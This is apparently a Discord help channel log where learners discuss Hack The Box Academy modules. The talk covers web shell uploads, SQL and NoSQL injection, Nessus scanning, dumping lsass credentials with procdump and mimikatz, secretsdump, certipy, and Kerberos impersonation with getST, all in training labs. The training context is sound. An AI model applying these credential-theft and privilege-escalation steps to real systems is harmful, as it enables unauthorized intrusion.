#modules

depeneds on ur goals

Tnx

I'm brand new and want to learn as quick as possible. I'm seeking a career change into cyber security.

depending on what u wonna do it takes 1000s of hours its alot too learn cant really speedrun it

brah i finally got the flag i thought sum was wrong with the lab lmaoo

You don't need to add it to /etc/hosts for vhost fuzzing, if you specify the IP and port. I'm assuming they tell you to add it to /etc/hosts so you can visit the page after you have discovered it.

Can anyone help here iv got a shell on the machine and keep looking trough logs but cant find the pass🐣

like iv dun the 3 sections after it

module

Thanks!

Hello, I am a beginner. Can restrictions be removed from ChatGPT?

Hello people, File Upload Module --> Whitelist filters. I have managed to bypass the whitelist and blacklist filters and upload php files (various via burp intruder), but I cannot access them! I get 404, even though I should get at least something

How are you trying to access that uploaded php file?

Via /profile_images/shell.inc (.phar, .phps, etc)

It returns 404 for all the bypasses that had "File successfully uploaded" message. /profile_images/ comes from HTML code inspection, it has to be the same for most exercises in the module...

did you try the reverse double extension technique?

Yes, I am using a wordlist with different double php + image extensions, reverse and not reverse. This is already bypassed. The file is getting uploaded, I do not understand why I cannot access it in that dir

Maybe the server is rejecting code execution. Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.

There is a list of 570 different double extension payloads that are processed by burp... But it's really slow. I really need to use ffuf for this to check

Hello

How to learn hacking I'm new

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

UPD: Works. With the last payloads from the list. For the love of god, please have mercy and put it at 30 or 40, i dont have that much time tbh...

oops. wrong chat!

attackig common services - hard

Once logged in, what other user can we compromise to gain admin privileges?

i have tryed lot of stuff but can figure what to do here ... i just need a single short hint ..

Hey, I go through CJCA learning path and in Linux part - "Backup and Restore" there is excercise to practice rsync, and do backup to local pwn machine. What is the password for local user to ssh to 127.0.0.1?

im redoing password attacks: Pass the Hash

whenever i rdp (remmina) using pth, i can only do it once, if i exit out and try again it tells me that the username\password is wrong

how do i rdp in again if thats the case

Maybe try another RDP client

Yi

Yo guys

Hi

Please read #welcome and #rules to gain access to #general. The Discord breach has nothing to do with the Academy's modules.

No what I mean is pls check your discords

Bc sm might be hacked

And ty but I've been in this server for almost an year

I'm usually off but I will try to be more active

Btw I did what u said and I still don't have access I did that like 6months ago

To gain access to #general, you must verify your user account. Read and follow #welcome

Ok

Ama do it again

And see if it works

It may be out of topic, but do you recommend me finishing the ctps and then sec+ or the other way around?

Where can I post jobs?

Security+ is a beginner-level cert aimed at security fundamentals. CPTS is a lot more technical, hands-on, and pertinent to pentesting, akin to the OSCP.
So consider sec+ first, then move on to CPTS (although you'll probably still need more studying before tackling the latter)

Hey

Alright thanks man I appreciate it

user impersonation

Don’t cross post @stoic heart - posted in all wrong channels - #1024429874246590575 might be better. But we’re not your homework helpers

bump

Still need help

I don’t have permission to post in other channels

Saw your post now in #1024429874246590575 - one place is more than enough

Also - if you want access to more channels, all the instructions you need are in #welcome

Hey guys, I tried to figure out what the problem is and tried to fix it but I can't any idea? On my laptob it is not working I have what you can see on the screen, but on my pc home when I do a multi handler of this (like in the module) everything is good (module tunneling and pivoting section meterpreter)

OSINT: Corporate Recon | Section staff

that seems like it should be the number but it doesnt work ? ( also not working with +1 )

i cant hit finish , even though i have submitted the flag , what do i do ?

You probably didn’t end all sections of the module

I did ... ..

The last 2nd one I have submitted the flag and it has also accepted it but... Won't let me go further

Maybe you forgot a question to complète?

Or try a refresh of the page

Naa.. only had 1 question to submit the flag ..

Done several times

Hmm weird maybe just an issue i guess can’t help you further ^^

Dude...

you still stuck there ?

you still stuck there ?

i keep getting stuck at the filter contents for linux where i need to: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

looks like the medium skill lab you're missing something

ss -a is still grabbing interfaces that you may not want it to; break the question down

It won't let me even update the flag ...

It's just stuck

did you click 'complete & next' on that page?

Ya I did ..

otherwise reach out to support on the website

looks like it's telling you what it wants you to do load stdapi; for whatever reason it's not loading here

Already tried but nothing happens

if it's not the pwnbox then there's gonna be very little help aside from advising you to reinstall meterpreter/msfconsole ¯_(ツ)_/¯

if it is in the pwnbox -> reach out to website support

Hi all, can someone give a hint on how to solve the last challenge of the "Intruduction to NoSQL Injection" academy module? I already tried all payloads seen during the course.
I'm guessing it is Server Side JavaScript Injection but

1. I can't see any javascript on the pages
2. I can't find an oracle
   I also tried fuzzing the three requests (/login, forgot and reset) with the two wordlists mentioned in the course without any result, I'm pretty stuck 🙄 if someone could help with a slight hint that would be great 🥹

where is this thing in academy 2.0 ? 😄 do I need to open my eyes or its missing

I'm guessing it's not available yet cause of beta.

Hello, I think there is a bug on the Skills Assessment - SQL Injection Fundamentals. I managed to login to the app, and found out the supposed vuln parameter within the chat. However, it always returns 200 ok, and the chat dissapears entirerly no matter what, unless the param is just a text without any sql. At this point, I took a look through solution as I was stuck, follow the exact steps, which already did before, and have the same persistent issue. Any thoughts?

I have restarted the target machine, and it works now as intended

not every module has a resources button

Hi all im new here, I have been with HTB before but decided to make a new account

Hi guys I'm stuck on SQL Injection Fundamentals: Skills Assessment - SQL Injection Fundamentals
I'm been stuck on the first question "What is the password hash for the user 'admin'? ", and I've tried all the different type of auth bypass injection for the login page, but they give me errors. The module says I need to use Burpsuite but Idk how I'm supposed to use it for this section.

Hi guys, im new to ctf. May i ask how long roughly it's covered?

Can I finish ctps just with the pentester job role path?

Sorry if this isn’t the right spot. Are there groups that tackle Bug Bounties? These critical bugs have good payouts that could be divided across a team of hunters

This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?

help me

It costs 10 cubes and you get 10 cubes back I believe

Incorrect answer!

Error Incorrect answer! It appeared like that

This answer is absolutely correct.

ok

While you are working on the module, there will be questions that you have to answer. These questions will sometimes give you cubes in return. A total of 10 cubes. Not all questions reward cubes. They are distributed in such a way that when you have finished the module, you will have received the 10 cubes that you spent to unlock it.

Is there something i'm missing about sqlplus? I"m working opn the footprinting module and its saying use sqlplus to login to the oracle db but when I try to use it in the pwnbox it wont install and when I try installing it both on the pwnbox and on my own system it says it can't be located

Hey can anyone help me with the skill assessment 2 for introduction to evasion techniques i tried creating a vbsvrupt and putting it on the target folder but not getting a shell

which module

because its available with some other name

no worries ...verify youself to access other channels #welcome

yes you can

The intro to windows evasion one I managed to find the flag couldn't get a reverse shell had to start a server and capture the flag on desktop of the user that clicks on the file

Vulnerability Assessment - Nessus skills assessment
"Alternatively, use the pre-populated scan data to answer the questions below without having to wait for the scan to finish but feel free to practice configuring and running it." where can i find the pre-populated scan data?

U can dm me

Hello everyone… new here is it possible to do the modules in a virtual machine if I’ve don’t have a paid account

Do you mean your own VM? yes of course, however the pwnbox (the provided vm) can only be spawned for 2 hours a day (iirc) for free users.

...

Yea the 2 hour limit is my issue why I’m wanting to run in a virtual machine

Yeah you can use your own vm, but target lifetimes are maxed at 6 hours per spawn. You can of course re-spawn it but whatever work you will have done is gone.

Ah I see thank you

it's on the target

hi im new to HTB. im working on one of the network fundamentals module and i wanted to do the extra skill assessment. some how i cant to ctrl-v in shell?

ctrl+shift+v into terminal

mmmh more specifically?

the part im on says i have to do user anonymous ctrl+v enter enter and it just says command not found

connect to https://target:nessusport and there should be a scan in the history

oh

The target is that one has spawned or 172.16.16.100?

the target that's spawned, you have no way of reaching the internal network from the outside

yeah pressing ctrl+v -> Enter MANUALLY inputs the escape character sequence for the enter key [^M]

Becouse 172.16 is a pivate IP address?

ctrl+v enters "verbose keys" mode

no; because it's a separate internal network; 10.129.x.x is also a private ip address

exactly, but ok

the vpn only gives you access to the 10.129.0.0/16 range of targets

got it

For Hack The Box VPNs treat 10.x ips as if they were public ips. Other than that you can retain the private and public classifications

Another question, when i put the credentials in Nessus in Windows section, whats the goal of it?

? wdym? for a credentialed scan?

Nessus does a wide sweeping scan; if you provide credentials, it attempts to log in and enumerate using said credentials on various services

Yes, because i see that also in Assessment --> Brute force there a box where putting credentials, but i want to know the difference between this section and the dedicated Credentials section

there's 2 types of scans (in general) credentialed and non-credentialed

i have put credentials for windows

You don't really need to do the scan yourself tbh, as was already stated there's a pre-populated scan... unless you WANT to wait like an hour for the scans to finish

whats the difference?

the credentials you provide will be used to attempt to log in to services
with a non-credentialed scan, the only attempt to be made would be for anonymous/null sessions

Brute force: You provide a list of credentials and it will try all of them but not go further
Dedicated: You provide known credentials and it will utilize them to scan the internals

I generally wouldn't concern myself too much with learning the ins and outs of a vulnerability scanner tbh

internals so?

[unless it's actually part of your job]

internals as in services on the system

I generally dislike this module as part of the path because it's just a dartboard module; throw stuff at the dartboard and see what sticks

vuln scanners can be useful, but they're more of compliance checklist tools than they are fully helpful, like linpeas/winpeas

I only really liked the theory parts of it.

sure, you'll find SOMETHING but like you'd find it faster just manually enumerating

is this not a phase of a pen test?

no

It's not a phase, it's a tool for a phase.

the third phase is vulnerability assessment

Vulnerability Assessments are done in the early stages of security hardening

before a pentest is performed

Vulnerability Assessment IS NOT Vulnerability Scanning

whats the difference?

A vuln assessment is just there to tell you of POTENTIAL vulnerabilities; A vulnerability SCAN is to actually go through and verify what is/isn't vulnerable

i thought that when u have perfomed Information Gathering, i have to go on with vulnerability assessment

Vulnerability Scan: Automated way of locating POTENTIAL vulnerabilities, detected in automated ways (it's a form of information gathering)
Vulnerability Assessment: Judgement of the pentester on whether a vulnerability is worth looking into and continue to exploiting and so on (chance of exploitation, complexity, and chance of damage)

I think that's kinda incorrect w1ld as a vulnerability assessment is a form of auditing as well

If this module named Vulnerability Assessment, why is not?

Well yeah, you're auditing which vulnerabilities you found are real and which are probably not applicable or out of scope

It's a different thing entirely; A company will perform a Vulnerability Assessment PRIOR to actually hiring pentesters in order to qualify their scope

i think that the using of Nessus come after the Information Gathering

The module goes over the theory behind Vulnerability Assessment, and then discusses vulnerability scanners which is a tool used to aid in vulnerability assessment (i.e. actually locating the vulnerabilities)

A vulnerability assessment just shows potential surface level vulns that a company can harden prior to having a pentest performed.

But that's why i hate the scanners as a whole because, again, dartboards

ok and the third fase of a pen test process called Vulnerability Assessment when is perfomed? And which tools are used?

yeah ngl I just realized we were talking about two different things... IMO those should be called Vulnerability Audits, rather than assessments since Vulnerability Assessment is a part of the process in Pen-Testing

yeah; and that's what the module is actually talking about, vuln audits rather than vuln assessment imho

it's not a bad module; but it's placement just also feels lacking

exactly, this is why i am confused

?

your brain

you shouldn't necessarily need automated tools in order to hunt vulns

the only time you'd need an automated tool is if you've tried literally everything else and haven't moved forward

so the process is Information Gathering --> look at the results to see if something could be vulnerable (Vulnerability Assessments) --> Exploit

right?

Added an erratum, hopefully this clears up misunderstandings in the future https://discordapp.com/channels/473760315293696010/1426851885691834458

yes

yep, Just understand that that module is talking about "Vulnerability Scanning" not Vulnerability Assessment

and this is just a way to perform Information Gathering and Vulnerability Assessment using an automated tool like Nessus?

It was honestly one of my least favorite modules because i didn't really 'learn' anything off it, just "here's a scanner that will likely provide false positives, have fun"

even then it's not really performing vuln assessment (For info gathering) it's just "here's a ton of potential problems, and most of them are benign, oh and some stuff is marked as info but it's actually important probably"

hey guys silly question so ive installed bloodhound from https://bloodhound.specterops.io and followed all the steps there for how can i enable and disable ?

It's not a way to perform Vulnerability Assessment(phase) on its own, an automated scanner cannot be the judge of vulnerabilities, only the tester can.

https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart

nvm my bad just found out i can do it from the tool syntax 🤦‍♂️

Obviously, I meant that this tool provides you with a lot of information that can be evaluated by the tester, instead of performing Nmap against a target and searching on Google for known exploits about the service running on it.

honestly the nmap and google strat is 10x faster; because even then the nessus thing you still need to google exploits

i will proceed to delete this modulo from the Vulnerability Assessment phase so

you've done the nmap module yes? then you should know nmap itself can act as a vulnerability scanner

--script vuln

don't think of any of these tools as the end all be all, treat them like tools in a toolbox, if one doesn't fit or work, then find one that does.

there's a reason all these modules cover multiple ways to do the exact same thing

you right

at this moment i have done only the Information Gathering phase, i know Nmap and little else

bro's gonna have so much fun when he's finally exploiting things

so can i think Vulnerability Assessment and Information Gathering as a single phase right?

i really think so

@waxen totem

Little update on NoSQL Injection: the oracle was ||Content-Length HTTP Header|| . Module completed 🎉

Well, you can do them in tandem but that becomes cluttered really quickly especially without the experience

it's better to have all the information before making a judgement is all.

for example, an FTP server that can be accessed with Anonymous login is already a vulnerability, right?

yes but depending on others that you find you might want to pursue it, you might not

of course

don't judge a vulnerability too quickly

so the vulnerability assessment is just a phase where u study the information you got before

is it right?

You might think: Ohh this is a low impact vulnerability since it's easily fixed, but what if you have an ssh key in there? or a RootCA?

Not just study but rate, the best example of a rating for a vulnerability is its CVSS score.

Present in that module

CVSS highly depends on Impact, not just vulnerability itself.

^

experience

also in-general, you should be able to roughly defend your CVSS score you provide.

i.e. normally this would be an info/CVSS 1.0 however, this vuln leaked extremely sensitive credentials

You mean I can't have all my 20 findings be critical 10.0 vulnerabilities?

10.0; I was able to exploit it, and i'm terrible at this

in the CVSS site liked on the module is there an explaination about the score?

TLDR: something you can exploit on it's own yes counts as a vulnerability, BUT a chain of exploits also counts as a vulnerability.

Imagine you have anonymous access to a file share with an encrypted zip file containing, ssh keys, but the zip encryption is crackable.

Weak Encryption Password- Vulnerability
Anonymous FTP login - Vulnerability

SSH Key leak through Anonymous FTP login and Weak Encryption Password - MASSIVE Vulnerability.

CVSS deals with the CIA triad

and some other factors

i.e. how do you access this resource [can you access it externally or is it required to be on the same network]; is there some other factor involved, does it breach any part of the CIA triad

of course

so do you get why you want to gather all the information before making an assessment?

i.e. i wouldn't necessarily say something being hosted on the admin share is a vulnerability in and of itself

because, if only admins can access the share -> then it's relatively confidential

making a syntex, Vulnerability Assessment can be done rating the informations i got before, using CVSS and CVE

and personal experience

CVSS is generally better for post-exploitation

not before exploiting

but it describes the impact of a vulnerability

because an anon share can have absolutely nothing on it; thus making it more of an informative vuln like "Hey some idiot spun up a share and it was never taken down"

Yes but Vulnerability Assessments are used to figure out: Alright, where do we start in this massive swamp of vulnerabilities

^

you don't know the impact a vuln could have until AFTER you exploit it

clear

was just using CVSS as an example on how to rate vulnerabilities, but you should be fine by just judging: high chance of exploitation, low chance of damage to systems, and low complexity

in general after the scanning phase you want to rank the potential vulns in order of most to least likely and start there

so the correct definition is: Vulnerability Assessment can be done rating the informations i got before using personal experience and google

Vulnerability Assessment is the prioritization of vulnerabilities to exploit in order, based on personal experience and google

clear

really appreciate your help guys

I like to think of it this way as well: Say you have 2 vulns presented, anon share and an SSH server that MAY BE vulnerable to shellshock; the more likely thing is anon share and you start your enumeration from that point instead of diving down the shellshock rabbit hole

https://blog.qualys.com/vulnerabilities-threat-research/2014/09/24/bash-remote-code-execution-vulnerability-cve-2014-6271

and your list could also be ranked in "how comfortable am I in attempting to exploit these potential vulns"

and you go back into info gathering when you reach that one vulnerability in the list that you really couldn't be bothered to exploit

Oh it's possible just with that?

Hello guys, I need help with the SeDebugPrivilege Section in the Windows escalation module. I was able to use minikatz to make the lsass.dump file... but since im using xfreerdp3, I have no clue how to actually get it to my own system to crack it offline.

Is anyone able to help?

xfreerdp has the /drive: option

/drive:name,/path/ or /drive:/path/,name

Do I have to run it as I use it to RDP in? Or can I open another terminal and do it that way?

yes you have to use it as you rdp in, otherwise you can start up an smb server

with the /drive: name,/path/ you mentioned. I assume path is the path to where the file is... is name the name of the file I assume?

reverse shelling after making it semi interactive with /bin/bash it gets stuck on some commands and takes a while before I can execute something else, any fixes?

/path/ is the filepath on your local system

name is what it'll appear as in the file viewer; it's spinning up a share, basically

So... im struggling to connect some dots here. So its spinning up a share for all intents and purposes... I'm not following how this helps me get the file on the remote machine locally.

in the cmd line on windows it would be //tsclient/name

the /drive:name,/path/ mounts a local filepath to the rdp client as the name you give it

i.e. an inconspicuous name like "Tools"

for instance if you want to transfer files to/from the session and don't want a dedicated folder to use you can use /tmp

so /drive:tools,/tmp/

and it will mount YOUR /tmp/ folder on YOUR linux machine

in the remote session you can drag and drop files to/from that folder to transfer files

is cp or move a thing in windows cmd?

or use the copy command

but you'll need to use //tsclient/tools/ (for example) to copy a file over

or move iirc it's move and copy; windows is more verbose in a lot of its commands

fun fact: the rdp binary in windows is called mstsc.exe -> Microsoft Terminal Services Client. that's why it's mounted as //tsclient/name

where name is whatever you decide to name it

It keeps saying network name can't be found

and Im using the name I used before

?

Alright this is the command in linux I ran:

xfreerdp /drive:test, /test/ /v:$target /u:<redacteduser> /p:<redacted password>

I exported the ip into target

does /test/ exist?

yes it does

anyone encounter problems trying bloodhound-python and nxc-ldap-bloodhound around module-163(AEN)?
is this a ligolo-ng specific problem?

and you can't find the file location in the file explorer on the windows side?

when i run //tsclient/test on windows it says "The network name cannot be found"

oh also error being related to dns and ldap timeout mostly

yeah i wouldn't worry about that

can you copy over a test file using
copy <file location on windows> //tsclient/test/

hi this isn't #general ; you'll need to follow the instructions in #welcome to gain access to typing there

Miss click. Thanks

if it's an error relating to timeout it's likely a network issue; is there a problem with running the collector directly on the machine instead of remotely?

collector also get ldap problems I remembered

though it should be the same host the module is telling me to run sharphound on,
with full access of course

i suggest going through AEN blind especially if you've gone through the CPTS course

that means just spinning up and going from boot to Domain Admin (or highest priv level)

and not answering the questions

or reading the module

agree
I am in half the way through
Initally I tried to do it blind but I head into some roadblocks real early on so I just went lazy lol

then you're gonna struggle hard on the exam

learn to tough it out and fight through the roadblocks instead of looking for the easiest way out

AEN blind is a test of your methodology and notes

it's not JUST about completing the module, it's about hardening your methodology and problem solving skills

it's alright to take a peak if you feel like you've tried everything, but you shouldn't be using it as a guidebook. The simplest thing to do is reset the target and see if that resolves the issue, getting back to that same point would be trivial

So... it keeps saying my syntax is wrong... the command on windows: copy C:\Tools\Procdump\lsass.dmp //tsclient/test

specify the / at the end and maybe specify the filename as well

now I just kinda memorized the methodology of passing through the first few machines
Maybe I'll take a break to reset my mind first

wrong, you didn't memorize the methodology, you memorized the methods

is lsass.dmp not specifying the file? the file name is lsass.dmp?

as in specifying it to the file location you're copying to

it also says the system cannot find the specified file

cannot find specified file
is that on the local end? that means that lsass.dmp isn't where you think it is ig (procdump can still run even if you specify a bad file location iirc)

I already ran procdump and it created lsass.dmp

The file path to lsass.dmp is: C:\Tools\Procdump\lsass.dmp

and you can verify that it does in fact exist? :)

I'm staring at it right now

then try this: open the file explorer -> this pc -> tsclient -> test

folder is empty... but it is there

ill just drag and drop it?

ye

ok. thank you so much

no idea why it's not working via command line but also sometimes it's tricky ¯_(ツ)_/¯

i mean the alternative is mounting it as a drive using net use

I was honestly close to saying screw it and spinning up a smb server and just doing it that way

also curious if it's a direction issue

// vs \\

ill try it here in a sec

let me get it to my local machine and ill test it

but that may just be a "windows is dumb sometimes"

typically // and \\ is automatically translated with windows, but some commands can be touchy

sooo... now I have a different issue

When I go to drag and drop, the rdpclient keeps flickering on and off almost... and it doesnt finish copying over.

It gets to like 40 percent and then flickers and never copies and I have to keep moving it over.

stuck in file uploads module. Able to upload the php file but cant find it in the uploads directory even after the correct naming scheme

nvm

We got it over.

Also direction didn't matter for me sooo I dont know what was going on there.

But we got there. I appreciate it. Thank you!

We are in fact not there yet... I'm now having issues parsing the dmp file locally... its encrypted and I don't know how to decrypt it so I can run it through hashcat.

When I finish the information security foundations, do I just jump straight into pentesting job role path or are there any other paths I should be doing or modules that you guys recommend?

it shouldn't be encrypted, but you will need certain other files to read it properly

IIRC it's SAM and SYSTEM

So secretsdump.py?

you can jump straight to it

yeah

kk

can someone help

DM me

Anyone got a pointer on this? really confused as to why the number i found isnt the correct one. (OSINT: Corporate Recon | Section staff)

Hello, everyone! I am having an issue with the Password Attacks: Credential Hunting in Windows module.

I found the answer to the question “What is the default password of every newly created Inlanefreight Domain user account? (Format: Case-Sensitive)” in the script, but it is not being accepted. I would be very grateful for your response.

delete flag bro

i dont understand? both screenshots are flagged as spoilers for a reason

Yeah... but still dont post them. I also believe its against htb TOS to post any kind of spoilers... especially flags for anything not tier 0.

how else do you want me to show that the only given flag is "incorrect" 😭

Ask for help and see if someone is willing to have you DM them to talk in private about it

Or just say what you did and mention that the flag you saw is not showing as correct

someone who is able to help will when they have time and see it

i still dont understand whats the fuss about sincei ts clearly marked as spoiler but here ya go

point is that it is still visible u could blurr or draw smth on it to leave only format of flag

hey guys, im currently doing the network enumeration with nmap module, on nmap scripting engine there is a question "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.". i used ||nmap 10.129.2.49 -p- -sV --script banner | grep "_banner" ||and got the result, but the found flag is shown as incorrect? not sure if it matters but im using beta

^when i didnt use ||grep|| there werent any ||banners other than what I have here||

i have problem with one modul where i need to satart a box and find how many software interface modes are awalible but it seems there are none but answer was 2

Check the driver capabilities for the interface. How many software interface modes are available? (Answer in digit format: e.g., 3)

Advice on LLM Output Attacks - Skills Assessment
Im stuck and no out of ideas to try, can someone point me toward right direction?

could anyone give me a nudge for advanced sql injections skills assessment question1? having trouble || dumping password hashes||

Guys

"Above, we created the user JLawrence and did not set a password. So this account is active and can be logged in without a password. Depending on the version of Windows we are using, by not setting a Password, we are flagging to windows that this is a Microsoft live account, and it attempts to login in that manner instead of using a local password."

Can anyone explain this in regards to the cmd in the section above it?

Module: Intro to Windows CLI Section: User and Group Management

What is meant by live accounts, isnt the no-password login similar to a guest account?

Maybe it's the wrong flag and must be used with another question.

That's a flag for a different section; look closely at the examples and draw conclusions of where to focus from there

thank you, it seemed a bit familiar

Can somoeone help with module common attacking aplications
The submodule
Thick client applications

Can I compile java with IDE like eclipse?
Or is necessary to do commands in powershell?

You can DM me

If you're still stuck

Sorry ik this isnt the right channel but why is this the only channel i can talk in

I'm stuck on Skills Assesment in ADCS Attacks module
I managed to get machine's certificate dev01.pfx but it fails to authenticate
||
certipy auth -pfx dev01.pfx -dc-ip 172.16.19.3
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Though I can use -ldap-shell and set_rbcd
I can't get a ticket to proceed
getST.py -spn cifs/DEV01.LAB.LOCAL -impersonate Administrator -dc-ip 172.16.19.3 lab.local/tom:tom123
||

@zealous hazel Have you verified your account?

About the previous conversation about Nessus, would you insert it into the Info Gathering phase instead of Vulnerability Assessment?

i dont think i have. do i have to verify with my phone number?

No, with your HTB account (see #welcome ). I may be wrong and there is something else blocking you from posting in other channels, hope I'm right though. You can also check this https://help.hackthebox.com/en/articles/5193100-welcome

Hello all, I'm having the same issue as this guy (though he didnt get an answer), aquatone is too old its completely broken I downloaded it the exact way the course shows (e.g. latest version which came out 4 years ago) the repo has been archived since 2023 and when I generate the report it's completely broken (while eyeWitness scan worked amazingly).

Requests:
 - Successful : 15
 - Failed     : 0

 - 2xx : 15
 - 3xx : 0
 - 4xx : 0
 - 5xx : 0

Screenshots:
 - Successful : 2
 - Failed     : 13

Either there's something very wrong with my setup (go/1.22) or the flag is impossible to get

What does the header on the title page say when opening the aquatone_report.html page with a web browser? (Format: 3 words, case sensitive)

Does anyone know how to skip this? (/module/details/113 -> Application Discovery & Enumeration)

Module: Introduction to Windows Command Line
Section: User and Group Management
Anyone, a little help? It asks "Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?" and every time I try to filter for him, it says "Server has rejected client credentials"

geniune question but im expected to complete the linux fundamentals module in 6hrs according to HTB academy, is this seriously realistic progress and learning?

you should try to absorb the material it's really only up to you

i feel like i can only achieve that time if i make no notes and dont practice

just confusing

Hey, send me a pm I definitely got the answer by now

do you have prior experience with linux?

sort of (i also main arch) but im still being met with unfamiliar concepts

so ig i dont have as much as i thought

tbh idk what my experience level with linux looks like, im not too confident abt it

i think its best i open up a thread in #1024429874246590575

Hey, send me a pm if you'd like I can help you with a nudge

Ya sure thanks man

hii guys how to get sharable link of htb labs

Hello guys
Please I am new here and I needed guide and I am interested to learn cyber security

Please how can I get started??

It gave you creds for the other user to connect with using SSH.

hi guys
who can help me to reverse ip?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@wooden niche ^

Thanks 😊

noone that can help out on this ? 😅

https://mxtoolbox.com/ReverseLookup.aspx

|| A number is displayed on the website. Your reasoning is certainly sound, but the question asks for “at least.” Therefore, you do not need to add anything.||

i swear i am going mad i entered the number, without adding sth, like 5 times yesterday, and it didnt work but it just worked and now i doubt my sanity (i even entered all numbers from 1-100 manually)

well it works ... thx ! :D

@acoustic owl thx for your response but it's not working

Well, if there is no PTR record, it is not possible to determine a domain.

what percentage can succeed?

DNS is like a phone book. Without a PTR record, there is no way to resolve the domain.

ok thx

Question: Try to read the details of the user with 'uid=5'. What is their 'uuid' value?

I got the "staff_admin" cookie by going to uid 10, can i have a hint on what im missing because ive tried entering 5 in api endpoint like the hint said.

Greetings
I have a question why is it that when I connect with a vpn I can’t get the flag but as soon as i tried it with the htb box I had the flag with the same command? It happened to me twice in different modules and I found it weird

Maybe your vpn wasnt actually connected you can Always check on settings try setting up the kill switch for more privacy

And proton vpn or surshark if you want your data nit tò get leacked:)

Web Attacks, IDOR. But I managed I get it via curl in terminal lol. Burp wasn’t working because I got confused

Depends on multiple reasons. HTB Machine is connected by default to the VPN, you may not have connected properly and therefore you were inable to connect to the target

I used the academy VPN not any personal VPN

Were you connected to it?

And were you able to ping target?

If not I wasn’t even going to be able to ssh the target

So you did SSH in?

I was clearly in the machine

Yeah

Don't think the commands you ran were the same then.

Depends on context of cmd though, I don't know what they are.

lol

I happened man I’m just complaining and if you want to it was on the enumeration with nmap

You wanna show me what you ran for both exactly?

If it's allowed. put a spoiler

If you want to ofc.

I will not I don’t to get banned

If there's no flags in it it's not bannable

And it’s ok on htb forum saw somebody complain of the same issue and from the same module

It’s actually a flag I wanted to get

No I mean in the command itself.

Just hide the actual thing you submit. Not the cmd.

Another I couldn’t get a file from the ftp servers on the following module but the the htb box I could is it supposed to be like that just asking

yeah this was pretty cool but took a long time and a lot of scrips to run LOL

--script http-enum I believe gets you there the quickest

yeah i saw "the thing we need" few other times while scrolling through walls of text some scripts gave me but i didnt rly think the answer was right in front of me, ngl i think this was an interesting lesson to leave no rocks unturned and i hope more modules will be like that to force that approach upon students

Hello

Hi a short question to the module "AI Data Attacks" is there a jp notebook which I can spawn. If yes where do i find it?

Ok problem solved i installed it myself on the parrot system

windows privesc well me an my AI are stupid we cant find out how you can find out what privilegie are set when you are allowed to run powershell as administrator

Hi! Can someone help me with the Pass The Certificate session on the password attacks modules, i rlly cant get the administrator flag. Pls dm me

so i'm having issues getting to connecting with vm

which module is it, and did u tried with the -Pn flag in nmap

also i dont think is a good thing to share flags, but idk

i'm like really new to all of this but it's the fawn

starting is the thing that matters, try using the Pn flag with nmap, windows sometimes block ICMP packets

oh ok i'll see

that works but it doesn't show me the ftp version which i'm needing for the current question

try again using the sV flag

If anyone is able to explain? Thanks.

-sV gives host seems to be down message

both the Pn and sV flags?

nmap -sV -Pn

together?

this seems to have worked thank you

the Pn flag assumes the host is up ( it doesn't send ICMP requests to verify), and the sV grabs the banner and run some scripts to try and verify the service and version running on the port

oh i see thank you... fawn has been pwned thanks to you, will note that down as well.

Question: is Kali or parrot better for modules

idk, i used kali before switching to arch

i only use arch bcuz of ricing tho

I’m currently trying to install smbclient on parrot and having issues

Hi everyone! I need a help in Attacking Web Applications with Ffuf.Filltering Results lesson, it says to add the htb.academy URL to etc/hosts so I can send a request using the Host header for vhost fuzzing. Could you please tell me why I need to add the IP address to etc/hosts? Why can't I just specify the full IP:port in the ffuf request?

DNS substitutes ip instead of URL.

So, with etc/host like this:

94.237.57.115 academy.htb

These two requests will be equivalent:

curl http://94.237.57.115:49747
curl http://academy.htb:49747

So, I don't have to add a DNS record and just send the request.

ffuf -w subdomains-top1million-20000.txt:FUZZ -u http://94.237.57.115:49747 -H "Host: FUZZ.academy.htb" -fs 0

but it returns an error.
And the next request without the host header works correctly.

ffuf -w  subdomains-top1million-20000.txt:FUZZ -u http://94.237.57.115:49747/FUZZ

You have to make your attacking machine recognize the domain name so:

• It's easier to remember a domain name than it is an ip
• to have requests be accurate to what the target is expecting
• to be able to add subdomains when you do find them e.g academy.hackthebox.com, if you do a vhost scan on hackthebox.com and find academy in your ffuf output

TLDR; cos you can't make a request to: example.academy.htb:49747 using example.94.237.57.115:49747 that's not a thing

But for your fuzz command you're filtering incorrectly and you have a typo: FUZZ.academy.htb. you added a . by mistake at the end, it should be FUZZ.academy.htb

I tried it without . and the result was the same.

can you show what happens when you remove the filter?

Module: Password Attacks
Section: Writing Custom Wordlists and Rules
hi guys, i have stucked on this section for 1 day. I have tried manually creating the password, then expand it using oneruletorulethemall, but it still not working, can someone share some tips on it?
https://academy.hackthebox.com/module/147/section/1391

Hi, can someone help me to understand the CVE web site or NVD website to see the specifications about vulnerabilities?

im browsing but i didn't see nothing yet

Solved

was bout to say: did you try the rule list provided in the module? hehe

Hey, on the Nmap module, on the hard lab I wasnt able to do it and ended up looking at a writeup, but I still dont understand the solution. Is it common to enumerate all the filtered ports and try to communicate manually? Im guessing automating a tool would be useful but I want to know if this is a common practice or done in this lab because the question is to get a service's version.

Mannually communicating with a service isn't done too commonly but it is very useful to know how to do.

Module: Password Attacks
Section: Skills Assessment
Link: https://academy.hackthebox.com/module/147/section/1356

I submitted the ntlm hash for the question. It got marked as correct.
However, I the Mark Complete Option is not showing up. ( I Have completed all other sections and marked as complete too)

Module: Stack-Based Buffer Overflows on Windows x86
Section: Remote Exploitation
Link: https://academy.hackthebox.com/module/89/section/952

I think I did everything right. I get a connection from the reverse shell but the connection closes after 5-10 seconds, and I don't get the shell on the windows machine.
I used windows/shell/reverse_tcp on msfvenom
Need some help guys I am lost.

Yea i did, but still not working with hashcat, maybe internet issue too slow on cracking, but then i get to do it with jtr

heyy guys

I'm having some issues with secretsdump in the Pass the Certificate section (Password Attacks Module).

